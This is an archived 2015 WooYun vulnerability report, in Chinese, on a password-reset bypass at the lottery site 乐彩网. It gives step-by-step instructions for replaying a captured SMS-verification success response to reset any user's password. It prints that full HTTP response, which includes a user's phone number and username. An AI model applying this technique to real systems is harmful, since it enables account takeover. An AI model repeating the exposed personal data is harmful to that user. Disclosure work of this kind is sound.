乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-11: 细节已通知厂商并且等待厂商处理中 2015-03-16: 厂商已经主动忽略漏洞,细节向公众公开
乐彩网于2004年成立,服务我国公益采彡PIAO事业,存在重置任意用户密码漏洞,影响整个系统账户业务安全,危害还是蛮大的,希望给个高rank!!!
1、测试时发现在校验短信码处存在绕过漏洞,导致可轻易重置任意账号密码。2、首先使用已知手机号进行一次正常的找回密码操作,记录短信码成功通过验证时返回的响应包,如下:
HTTP/1.1 200 OKServer: nginxDate: Wed, 11 Mar 2015 04:33:51 GMTContent-Type: text/html; charset=utf-8Connection: keep-aliveExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-control: privateX-Powered-By: ThinkPHPContent-Length: 6298<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>设置新密码 - 忘记密码 - 乐彩网 - 原创+专业+人气旺,踏实服务我国采彡PIAO公益事业(原网址www.17500.net被盗,请当心受骗)</title> <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/Common/css/reset.css?20150104" /> <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/Common/css/common.css?20150104" /> <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/User/css/user.css?20150104" /> <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/User/css/index.css?20150104" /> <script src="https://passport.17500.cn/Public/Common/js/jquery.min.js?20150104"></script> <script src="https://passport.17500.cn/Public/Common/js/common.js?20150104"></script> <script src="https://passport.17500.cn/Public/User/js/user.js?20150104" charset="utf-8"></script></head><body><div id="header"> <em> <a href="http://www.17500.cn" target="_blank">乐彩网首页</a> | <a href="http://bbs.17500.cn" target="_blank">乐彩论坛</a> | <a href="http://lebi.17500.cn" target="_blank">乐币点播</a> | <a href="http://sp.17500.cn" target="_blank">短信点播</a> | <a href="http://tb.tuganjue.com" target="_blank">图感觉图表</a> | <a href="http://taihu.17500.cn" target="_blank">太湖钓叟字谜</a> </em> <a href="https://passport.17500.cn/index/index.html" id="logo">乐彩网</a> <b>忘记密码</b></div><div id="section"> <div class="register fixed"> <div class="l"> <form action="https://passport.17500.cn/forgot/step2.html" method="POST" onsubmit="return user.forgot.submitchk2()"> <ul id="forgot_form"> <div class="fi"> <p class="t">正在操作的手机号为:<b>13828840869</b></p> <p class="c">请在以下选项中选择要找回密码的用户名</p> <p class="b"> <label for="uid_1246317" class="on" onclick="user.common.selectUser(this)"> <i><input type="radio" id="uid_1246317" name="uid" value="1246317" checked="true" /></i> kevin219 </label> </p> </div> <li> <input name="pwd" class="txtin tw3 i2" type="text" value="密码" readonly="readonly" /> <input name="password" class="txtin tw3 i2" type="password" style="display: none;" /> <p class="ti">请重新设置一个复杂的密码!</p> </li> <li> <input name="pwd2" class="txtin tw3 i5" type="text" value="重复密码" readonly="readonly" /> <input name="password2" class="txtin tw3 i5" type="password" style="display: none;" /> <p class="ti">请再输入一次您刚刚设置的密码!</p> </li> <li> <em class="yz fr"> <img id="verify_code" src="https://passport.17500.cn/code/index/rand/4703.html" onclick="user.common.changeverify(this)" /> </em> <input name="verify" class="txtin tw4 i3" type="text" autocomplete="off" value="验证码" /> <p class="ti">请填写右边图片中的验证码!</p> </li> <li> <label for="resetsecquess" class="twn"> 清空安全提问 <input type="checkbox" name="resetsecquess" id="resetsecquess" value="1" style="height:0; overflow:hidden; border:0; width: 0;"/> </label> </li> <li><input name="submit" type="submit" class="inb" value="提 交" /></li> </ul> </form> </div> <div class="r"> <p class="fg2"><b>联系我们</b></p> <div class="hz3"> <a href="http://wpa.qq.com/msgrd?v=3&uin=4008017500&site=qq&menu=yes" target="_blank" class="hz11"><i></i>4008017500</a> <a href="javascript:void(0)" class="hz12"><i></i>400-80-17500</a> </div> </div> </div></div><script type="text/javascript"> $(function(){ user.common.focusBlur($('#forgot_form')); user.common.verifyurl = "https://passport.17500.cn/check/verify.html"; user.common.passwordurl = "https://passport.17500.cn/check/password.html"; user.common.password2url = "https://passport.17500.cn/check/password2.html"; $('input[name=password]').blur(function(){ user.common.passwordchk(); }); $('input[name=password2]').blur(function(){ user.common.password2chk(); }); $('input[name=verify]').blur(function(){ user.common.verifychk(); }); $(':checkbox[name=resetsecquess]').change(function(){ user.forgot.changecheck(this); }); });</script><div id="footer"> <p> <a href="http://www.17500.cn/home/aboutus.php" target="_blank">关于乐彩网</a>丨 <a href="http://www.17500.cn/zhaopin/index.php" target="_blank">人才招聘</a>丨 <a href="http://www.17500.cn/home/vipright.php" target="_blank">服务说明</a>丨 <a href="http://www.17500.cn/pay/" target="_blank">支付方式</a>丨 <a href="http://www.17500.cn/home/contactus.php" target="_blank">联系方式</a>丨 <a href="http://www.17500.cn/comment/contact.php" target="_blank">在线沟通</a>丨 <a href="https://passport.17500.cn/index/index.html" target="">用户中心</a>丨 <a href="http://www.17500.cn/home/map.php" target="_blank">网站地图</a>丨 <a href="http://www.17500.cn" target="_blank">返回首页</a> </p> 快乐博彩,尽在乐彩<br/> © 2004-2015 版权所有 京ICP备13046446号|京公网安备11011202001644号 <script type="text/javascript" src="https://tajs.qq.com/stats?sId=37761611" charset="UTF-8"></script><br/> <img src="https://passport.17500.cn/Public/User/img/kx.gif" alt=""/> <img src="https://passport.17500.cn/Public/User/img/cx.gif" alt=""/></div> </body></html>
3、再做一次找回密码操作,如下图,下发短信码后,输入任意短信码(此处为123456),提交校验请求
4、可以看到响应提示短信码错误
5、用第一次重置密码操作得到的响应包替代此处,如下
6、释放请求后,成功进入重置密码页面,重置密码为:1111qqqq
7、重置密码成功,可利用该密码成功登录系统
见漏洞详细说明
完善认证机制,在前端和服务端同时校验
危害等级:无影响厂商忽略
忽略时间:2015-03-16 14:26
漏洞Rank:20 (WooYun评价)
2015-03-17:漏洞已经解决,感谢白帽子积极与我们联系,在我们没有正常收到漏洞通知的情况下,找到了我们的联系方式并致电我们,对此我们表示由衷的感谢,希望乌云能给其补发rank,此漏洞危害严重,建议补发20Rank